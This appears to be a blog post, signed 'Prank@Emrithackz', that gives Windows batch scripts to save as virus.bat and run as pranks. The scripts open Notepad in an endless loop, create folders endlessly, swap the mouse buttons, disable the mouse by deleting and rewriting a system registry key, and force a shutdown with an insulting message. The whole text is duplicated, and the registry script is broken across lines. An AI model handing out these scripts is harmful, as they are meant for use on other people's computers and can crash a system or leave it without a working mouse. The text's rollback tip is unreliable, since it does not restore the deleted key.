its virus time
its virus time
just type this in notepad and save it with name of virus.bat
and select file type-all files
and open it and see magic
just type this in notepad and save it with name of virus.bat
and select file type-all files
and open it and see magic
opn note pad continouly
@echo off
Title Prank@Emrithackz
:loop
Start Notepad
Goto loop
Make 1000 folder within a second.
@echo off
Title Prank@Emrithackz
:loop
md %random%
Goto loop
Make 1000 Folder (Folder in folder &...so on) within 3seconds
@echo off
Title Prank@Emrithackz
cd "C:\Documents and Settings\%USERNAME%\Desktop"
set num=1
:loop
md %num%
cd %num%
set /a num=%num%+1
goto loop
Open So many applications with a Single Click
@echo off
Title Prank@Emrithackz
start notepad
start explorer.exe
start calc
Swap(exchange) Mouse Button
@echo off
Title Prank@Emrithackz
Rundll32 User32,SwapMouseButton
msg * hahaha :D:D
msg * hehehehehe
msg * Now Fix it..
Disable Mouse
@echo off
Title Prank@Emrithackz
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Service\Mouclass"
reg delete %key%
reg add %key% /v Start /t
REG_DWORD /d 4
How Rollback the changes:- Just Change the last line of above code with "REG_DWORD /d 3" without quotes
Convey a message & Shutdown his / her computer
@echo off
Title Prank@Emrithackz
msg * I want to say something..
shutdown -c Error! You are too stupid! -s
@echo off
Title Prank@Emrithackz
:loop
Start Notepad
Goto loop
Make 1000 folder within a second.
@echo off
Title Prank@Emrithackz
:loop
md %random%
Goto loop
Make 1000 Folder (Folder in folder &...so on) within 3seconds
@echo off
Title Prank@Emrithackz
cd "C:\Documents and Settings\%USERNAME%\Desktop"
set num=1
:loop
md %num%
cd %num%
set /a num=%num%+1
goto loop
Open So many applications with a Single Click
@echo off
Title Prank@Emrithackz
start notepad
start explorer.exe
start calc
Swap(exchange) Mouse Button
@echo off
Title Prank@Emrithackz
Rundll32 User32,SwapMouseButton
msg * hahaha :D:D
msg * hehehehehe
msg * Now Fix it..
Disable Mouse
@echo off
Title Prank@Emrithackz
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Service\Mouclass"
reg delete %key%
reg add %key% /v Start /t
REG_DWORD /d 4
How Rollback the changes:- Just Change the last line of above code with "REG_DWORD /d 3" without quotes
Convey a message & Shutdown his / her computer
@echo off
Title Prank@Emrithackz
msg * I want to say something..
shutdown -c Error! You are too stupid! -s
No comments: